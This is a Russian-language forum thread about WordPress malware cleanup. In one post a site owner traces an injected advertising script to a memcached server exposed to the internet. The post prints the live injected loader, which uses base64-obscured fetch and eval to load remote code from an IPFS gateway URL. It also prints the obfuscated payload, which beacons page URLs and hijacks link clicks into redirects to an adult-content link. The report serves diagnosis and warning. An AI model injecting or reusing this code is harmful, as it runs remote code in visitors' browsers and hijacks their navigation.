Вирус Wordpress

как вариант, можно на кворке найти специалиста, который за 1000-1500 рублей найдет и удалит вирусы с сайта

И, как вариант, добавит новых ))

Зачем? Никто ничего добавлять не будет. Разве что не сможет всё вычистить. Потому как это дело непростое, в общем случае.

Это сарказм был.

Но вообще, на Кворке, судя по всему, одна школота осталась, серьезного исполнителя трудно становится найти, даже за хорошую цену.

Мне просто трудно представить, чтобы за поиск вирусов на ВП взялся кто-то серьезный, со знаниями, всего за 1.5К рублей.

Просто пытался объяснить, что подобная работа требует определенного подхода, занимает гораздо больше времени и стоит совсем иных денег.

То, что сделали вам, это поверхностное сканирование файлов движка внешними утилитами на внедренный код и удаление найденного вредоноса.

Полная очистка при таком подходе вообще не гарантируется, как и определение и прикрытие бэкдоров, из-за которых вредонос был внедрен.

Про то, что внедрение может быть и в БД, я даже не упоминаю и подобными методами найти вредонос в БД вообще невозможно, тем более, если он будет обфусцирован.

А значит, новое заражение - это вопрос времени.

Так можно бесконечно много раз платить за поверхностную очистку сайта от вирусов.

Как их найти вопрос)

Это еще фигня. Буквально сегодня ночью увидел на нескольких сайтах, хостящихся на bare metal в соседних папках, левый рекламный скрипт, причем на разных сайтах в разных местах в коде скомпилированной страницы в браузере (именно браузере, дальше объясню). Перелопатил я все файлы ручками, регулярками для grep, ai-bolit в кои-то веки запустил, я же вумный, у меня есть скрипт, что вставляется в код, я знаю что искать и даже в базе mysql порыскал. Ничего не нашлось, а при изменении чего-либо и сохранении шаблона левый код пропадал на несколько минут, минуту. И тут я решил посмотреть: а что у меня с кэшем? И о чудо, мой memcached торчит голой задницей в интернет (0.0.0.0), а не жестко привязан к localhost (127.0.0.1). Так тупо меня еще не имели.

Левый скрипт был вида <script>(function(w,d,s,l,i,j,k){w[d(j)](d(k))[s](c=>c.text())[s](c=>w[d(i)](c))})(window,atob,'then','https://www.googletagmanager.com/gtm.js?id=','ZXZhbA==','ZmV0Y2g=','aHR0cHM6Ly9nYXRld2F5LnBpbmF0YS5jbG91ZC9pcGZzL1FtWEtGRGpSZnFWUkZOSEczM1duSGdTbkFFWUNUUjN6OWszUGpmTWl5cXRkdkw=','тут уникальные циферки для каждого сайта')</script>

А тут что происходило: var _0x1c8663=_0x4f9a;(function(_0x11c16f,_0x571dfc){var _0x4b1d9e=_0x4f9a,_0x513241=_0x11c16f();while(!![]){try{var _0x473221=-parseInt(_0x4b1d9e(0x13b))/0x1+parseInt(_0x4b1d9e(0x132))/0x2*(parseInt(_0x4b1d9e(0x13f))/0x3)+parseInt(_0x4b1d9e(0x133))/0x4*(parseInt(_0x4b1d9e(0x12c))/0x5)+parseInt(_0x4b1d9e(0x127))/0x6+parseInt(_0x4b1d9e(0x144))/0x7*(parseInt(_0x4b1d9e(0x13d))/0x8)+-parseInt(_0x4b1d9e(0x143))/0x9+-parseInt(_0x4b1d9e(0x12b))/0xa*(parseInt(_0x4b1d9e(0x145))/0xb);if(_0x473221===_0x571dfc)break;else _0x513241['push'](_0x513241['shift']());}catch(_0x489706){_0x513241['push'](_0x513241['shift']());}}}(_0xea29,0xda9a1));function _0x4f9a(_0x311215,_0x531bf2){var _0xea297d=_0xea29();return _0x4f9a=function(_0x4f9acc,_0x13bfd4){_0x4f9acc=_0x4f9acc-0x122;var _0x29a291=_0xea297d[_0x4f9acc];return _0x29a291;},_0x4f9a(_0x311215,_0x531bf2);}!window[_0x1c8663(0x12e)+_0x1c8663(0x141)+_0x1c8663(0x12a)+'z']&&(window[_0x1c8663(0x12e)+_0x1c8663(0x141)+_0x1c8663(0x12a)+'z']='1',window['locati'+'on'][_0x1c8663(0x129)+'me']!=='/'&&(fetch(_0x1c8663(0x12f)+_0x1c8663(0x137)+_0x1c8663(0x138)+_0x1c8663(0x125)+_0x1c8663(0x12d)+_0x1c8663(0x123)+window['locati'+'on'][_0x1c8663(0x128)]),window[_0x1c8663(0x134)+_0x1c8663(0x131)+'ener']('click',function(_0x4f3741){var _0x1eacc8=_0x1c8663,_0x27325d=_0x4f3741[_0x1eacc8(0x130)]['closes'+'t']('a');if(_0x27325d==null)return;if(Math[_0x1eacc8(0x122)]()>0.5)return;var _0x195df3=localStorage[_0x1eacc8(0x13e)+'m']('__time'+'stamp');if(_0x195df3){if(new Date()[_0x1eacc8(0x139)+'e']()-_0x195df3<0xc*0x3c*0x3e8)return;}window[_0x1eacc8(0x146)](_0x27325d[_0x1eacc8(0x128)],'_blank'),setTimeout(function(){var _0x2f2008=_0x1eacc8;localStorage[_0x2f2008(0x13c)+'m'](_0x2f2008(0x142)+'stamp',new Date()[_0x2f2008(0x139)+'e']()),window['locati'+'on']['href']=_0x2f2008(0x12f)+_0x2f2008(0x135)+_0x2f2008(0x13a)+_0x2f2008(0x124);},0x0),_0x4f3741[_0x1eacc8(0x126)+'tDefau'+'lt'](),_0x4f3741['stopPr'+_0x1eacc8(0x136)+_0x1eacc8(0x140)]();},{'capture':!![]})));function _0xea29(){var _0x21a593=['28IznNLQ','176924RVgkse','open','random','be/v1/','3M18','fs.69.','preven','7485480dEvnbS','href','pathna','xyyyzz','950VpxPYC','5sBzFNj','mu/pro','porn_t','https:','target','ntList','2556EZLbib','4262756DhpWjC','addEve','//bit.','opagat','//gate','way.ip','getTim','ly/40Y','773274dmJrRH','setIte','2240992iWsvMe','getIte','1620FJivKm','ion','ube_xx','__time','8345142DHxCMq'];_0xea29=function(){return _0x21a593;};return _0xea29();}

И для тех, кому лень base64 расшифровывать, в гуглтаг была закодирована ссылка https://gateway.pinata.cloud/ipfs/QmXKFDjRfqVRFNHG33WnHgSnAEYCTR3z9k3PjfMiyqtdvL (не переходите, ну его нафиг)